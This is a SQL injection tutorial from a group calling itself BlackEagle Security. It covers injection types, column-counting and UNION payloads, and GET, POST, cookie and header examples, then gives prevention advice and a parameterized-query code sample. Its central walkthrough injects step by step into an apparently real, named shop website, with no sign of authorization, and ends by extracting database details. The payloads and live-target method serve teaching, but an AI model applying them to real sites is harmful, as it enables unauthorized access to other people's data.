SQL INJECTION
BY BLACKEAGLE SECURITY

WHAT IS SQL

SQL (Structured Query Language) is a standardized programming language specifically designed for managing and manipulating relational databases. It allows users to create, read, update, and delete data within a database. SQL is essential for interacting with and extracting valuable information from databases, which are widely used in various applications and systems.

What Is SQLi

SQL Injection is a type of security vulnerability that occurs in the database layer of an application. It happens when an attacker is able to insert or "inject" malicious SQL code into a query. This can compromise the security and integrity of the database and potentially the entire application. Here’s a simplified example to illustrate how SQL Injection works:

Normal Scenario:
Suppose you have a web application with a login form. The SQL query to check the user credentials might look something like this:
SELECT * FROM users WHERE username = 'admin' AND password = 'password';

MySQL Union Based

Detecting the number of columns

First you need to know the number of columns.

Using ORDER BY or GROUP BY

Keep incrementing the number until you get a False response. Even though GROUP BY and ORDER BY have different functionality in SQL, they can both be used in exactly the same fashion to determine the number of columns in the query.

1' ORDER BY 1--+ #True
1' ORDER BY 2--+ #True
1' ORDER BY 3--+ #True
1' ORDER BY 4--+ #False - Query is only using 3 columns
-1' UNION SELECT 1,2,3--+ #True

or
1' GROUP BY 1--+ #True
1' GROUP BY 2--+ #True
1' GROUP BY 3--+ #True
1' GROUP BY 4--+ #False - Query is only using 3 columns
-1' UNION SELECT 1,2,3--+ #True

TYPES OF SQL INJECTION

There are several types of SQL injection attacks that hackers can use to exploit vulnerabilities in websites and applications:

1. In-band SQL Injection:

This is the most common type of SQL injection attack, where the malicious SQL code is sent to the database and the results are displayed back to the attacker. In-band attacks can be further classified into:

- Error-based SQL Injection:
Hackers exploit error messages generated by the database to extract information about the structure and content of the database.

- Union-based SQL Injection:
Attackers use the UNION SQL operator to combine the results of two or more SELECT queries and retrieve additional information from the database.

2. Blind SQL Injection:

In this type of attack, the attacker cannot directly see the results of their actions, making it more challenging to exploit. Blind SQL injection attacks can be classified into:

- Boolean-based SQL Injection:
Attackers perform the injection by sending a series of true/false queries to the database to infer information.
- Time-based SQL Injection:
The attacker uses time delays to determine if a query is executed successfully based on the response time.

3. Out-of-band SQL Injection:

In this type of attack, the attacker uses a separate channel to extract data from the database, such as sending emails or making HTTP requests to a remote server.


How To Do SQL Injection

This is a website parameter:

https://itorchjo.com/shop.php?brandId=21

Now we will check by adding characters such as ', ", /, and \ to the website parameter to see if any errors or changes occur on the website.


https://itorchjo.com/shop.php?brandId=21'

Comparing both screenshots carefully, the website changed when ' was added.


Now we will try to fix this error by balancing the query with a URL comment sequence such as --+, --+-, -- -, or --/*, among many others.

https://itorchjo.com/shop.php?brandId=21 -- -

After removing ' from the URL and adding -- -, the error was fixed.


Now we need to find out how many columns are in the website, so let's start finding them.
To find the columns, we use `ORDER BY` and `GROUP BY`.

https://itorchjo.com/shop.php?brandId=21 order by 4 -- -

When we used `ORDER BY 4`, an error occurred on the website, which means there are not 4 columns. Now, we will keep reducing the number of columns until the error disappears.


Now, when we used `ORDER BY 3`, the website error was fixed. This means that the website has 3 columns.

https://itorchjo.com/shop.php?brandId=21 Order by 3 -- -

Since we have determined that the website has 3 columns, we now need to find out which of these columns is vulnerable. To find the vulnerable column, we use `UNION SELECT`.

https://itorchjo.com/shop.php?brandId=.21+UNION+SELECT+1,2,3-- -

Now that we have identified the vulnerable column, which is column 2, we can inject our malicious queries into this column.

https://itorchjo.com/shop.php?brandId=.21+UNION+SELECT+1,database(),3-- -

What Is SQLi DIOS

"Dump in one shot" (DIOS) refers to extracting the entire database in a single attack. This happens when an attacker injects malicious SQL code into a vulnerable input, allowing them to access or dump all of the database's data.



Different Types of SQL Injection

1. GET-Based SQL Injection:
Description: Occurs when user input is included in a URL query string and is used directly in SQL queries without proper sanitization.
Example: If a URL like http://example.com/page?id=1 directly includes the id parameter in an SQL query:
SELECT * FROM pages WHERE id = '1';

Injection: An attacker might manipulate the URL to include malicious SQL code:
http://example.com/page?id=1' OR '1'='1

Resulting in:
SELECT * FROM pages WHERE id = '1' OR '1'='1';

2. POST-Based SQL Injection:
Description: Occurs when user input is submitted via an HTTP POST request, typically through form data.
Example: A login form where the user submits a username and password:
SELECT * FROM users WHERE username = 'user' AND password = 'pass';

Injection: An attacker might submit:
username=admin'--&password=anything

Resulting in:
SELECT * FROM users WHERE username = 'admin'--' AND password = 'anything';

The -- comments out the rest of the query, potentially bypassing authentication.

3. Cookie-Based SQL Injection:
Description: Occurs when an application reads data from cookies and uses it in SQL queries without proper sanitization.
Example: If a web application reads a user ID from a cookie and uses it in a query:
SELECT * FROM users WHERE id = 'cookie_value';

Injection: An attacker might modify the cookie value to include malicious SQL:
cookie_value=1' OR '1'='1

Resulting in:
SELECT * FROM users WHERE id = '1' OR '1'='1';

4. Header-Based SQL Injection:
Description: Occurs when an application reads HTTP headers (such as User-Agent or Referer) and uses them in SQL queries without sanitization.
Example: If a web application logs User-Agent values into a database:
INSERT INTO logs (user_agent) VALUES ('header_value');

Injection: An attacker might set the User-Agent header to a malicious value:
User-Agent: malicious' OR '1'='1

Resulting in:
INSERT INTO logs (user_agent) VALUES ('malicious' OR '1'='1');

Prevention Techniques

1. Parameterized Queries:
Use prepared statements and parameterized queries to ensure user input is treated as data, not executable code.
2. Input Validation and Sanitization:
Validate and sanitize all user inputs to ensure they conform to expected formats.
3. Escaping User Inputs:
Properly escape special characters in user inputs to prevent them from being interpreted as part of the SQL code.
4. Least Privilege:
Use database accounts with the least privilege necessary for the task to minimize potential damage from an injection.
5. Regular Security Testing:
Conduct regular security assessments, including penetration testing and code reviews, to identify and fix vulnerabilities.
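As an added example (not the page's own code), here is the page's login query in its vulnerable string-spliced form next to its parameterized form, plus an allow-list check for a numeric `id` parameter, written against Python's built-in sqlite3 module. The `users` table and the `admin`/`s3cret` account are constructed sample data; the payloads are the ones already shown above.

```python
import re
import sqlite3


def make_db():
    # Constructed sample data: an in-memory users table with one account.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 's3cret')")
    return conn


def login_vulnerable(conn, username, password):
    # The pattern the page warns about: raw input spliced into the SQL text,
    # so a quote or a -- comment in the input rewrites the query itself.
    query = (f"SELECT id FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    # Prevention technique 1: placeholders. The driver passes the values
    # separately from the SQL text, so they are compared as data only.
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def user_by_id(conn, raw_id):
    # Prevention technique 2: validate a numeric parameter such as ?id=1
    # against an allow-list pattern before any SQL is built at all.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a positive integer")
    row = conn.execute("SELECT username FROM users WHERE id = ?", (int(raw_id),)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # The page's POST payload: username=admin'--&password=anything
    print("vulnerable   :", login_vulnerable(db, "admin'--", "anything"))     # True
    print("parameterized:", login_parameterized(db, "admin'--", "anything"))  # False
    print("real login   :", login_parameterized(db, "admin", "s3cret"))       # True
```

The same `admin'--` input logs in through the spliced query but is rejected by the parameterized one, because the quote and comment never reach the SQL parser as syntax.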



Google Dork For Sql Injection



Developer AnneX

Hello friends, I'm Annex here! I'm the admin of BlackEagle Security 💻 I'm a web developer and also an ethical hacker, pentester, bug hunter, and cyber security expert. 💻 I write code, break code, hunt for bugs, and secure systems. 🔒 Bringing together the worlds of programming and cyber security is my passion. 📠 If you ever need help with anything related to tech or security, I'm here to assist you! 🚡 Excited to connect with fellow tech enthusiasts and share knowledge! Let's dominate the digital world! 🚀


© Copyright BlackEagle Security